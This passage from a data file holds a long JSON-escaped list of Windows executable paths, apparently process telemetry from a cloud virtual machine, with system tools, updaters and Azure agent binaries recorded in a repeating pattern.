indows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagen